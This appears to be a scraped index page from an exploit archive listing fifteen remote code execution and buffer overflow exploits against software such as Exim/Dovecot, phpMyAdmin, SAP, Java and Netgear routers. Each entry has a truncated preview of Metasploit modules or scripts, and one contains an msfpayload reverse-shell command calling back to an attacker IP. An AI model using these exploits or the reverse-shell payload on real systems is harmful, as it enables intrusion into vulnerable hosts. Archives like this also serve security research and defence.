remote exploits
Page 1 of 2570 exploits
 |
Title | Author | Platform | Source | Description | Date |
|---|---|---|---|---|---|---|
|
Dovecot with Exim sender_address Parameter - Remote Command Execution | RedTeam Pentestin. | linux | exploit-db.com | Advisory: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution During a penetration test a typical misconfiguration was found in the way Dovecot is used as a local delivery agent by Exim. A common use case for the Dovecot IMAP and POP3 server is the use of Do | May 7 |
|
|
Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability | metasploit | windows | exploit-db.com | This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Met | May 7 |
|
|
phpMyAdmin Authenticated Remote Code Execution via preg_replace() | metasploit | php | exploit-db.com | This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 < Msf::Exploit | May 1 |
|
|
SAP ConfigServlet Remote Code Execution | Dmitry Chastuhin | na | Andras Kabai | This Metasploit module allows remote code execution via operating system commands through the SAP ConfigServlet without any authentication. This Metasploit module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2. | April 29 |
|
|
Windows Light HTTPD 0.1 - Buffer Overflow | Jacob Holcomb | windows | exploit-db.com | import urllib2 from time import sleep Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow Discovered and Reported******24th o | April 25 |
|
|
SAP ConfigServlet Remote Unauthenticated Payload Execution | Andras Kabai | windows | exploit-db.com | require 'msf/core' class Metasploit3 < Msf::Exploit include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'SAP ConfigServlet OS Command Execution', 'Description' => %q{ This mo | April 25 |
|
|
Java Applet Reflection Type Confusion Remote Code Execution | juan vazquez | na | Jeroen Frijters | This Metasploit module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet. | April 23 |
|
|
Netgear DGN2200B pppoe.cgi Remote Command Execution | metasploit | hardware | exploit-db.com | This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 < Msf::Exploit | April 22 |
|
|
SAP ConfigServlet OS Command Execution | Dmitry Chastuhin . | multiple | exploit-db.com | require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'SAP ConfigServlet OS command execution', 'Description' => %q{ This | April 18 |
|
|
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution | Wireghoul | windows | exploit-db.com | Exploit Title: Firephp firefox plugin RCE Date: 17/04/2013 Exploit Author: Wireghoul Vendor Homepage: www.firephp.org Software Link: https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/ Version: All versions up to and including 0.7.1 Tested on: Windows 7 Advisory: | April 17 |
|
|
KNet Web Server 1.04b - Stack Corruption BoF | Wireghoul | windows | exploit-db.com | !/usr/bin/perl KNet Web Server Stack corruption BoF PoC Written by Wireghoul - http://www.justanotherhacker.com Date: 2013/04/11 Version: 1.04b Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - | April 12 |
|
|
Adobe ColdFusion APSB13-03 Remote Exploit | metasploit | multiple | exploit-db.com | This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'digest/sha1' require 'op | April 10 |
|
|
FreeFloat FTP 1.0 - DEP Bypass with ROP | negux | windows | exploit-db.com | !usr/bin/python Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP Exploit Author: negux POC: http://www.exploit-db.com/exploits/24479/ Tested on : Windows XP SP 3 Spanish import socket,struct msfpayload windows/shell_reverse_tcp LHOST=192.168.1.117 LPORT=443 R | msfenco | April 10 |
|
|
BigAnt Server 2.97 - DDNF Username Buffer Overflow | Craig Freyman | windows | exploit-db.com | !/usr/bin/python Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman (@cd1zz) http://pwnag3.com Tested on: Windows 7 64 bit (DEP/ASLR Bypass) Similar Exploits: http://www.exploit-db.com/exploits/24528/ http://www.exploit-db.com/exploits/24527/ http://www.exp | April 10 |
|
|
MongoDB nativeHelper.apply Remote Code Execution | agix | na | metasploit.com | This Metasploit module exploits the nativeHelper feature from spiderMonkey which allows control over execution by calling it with specially crafted arguments. This Metasploit module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze. | April 2 |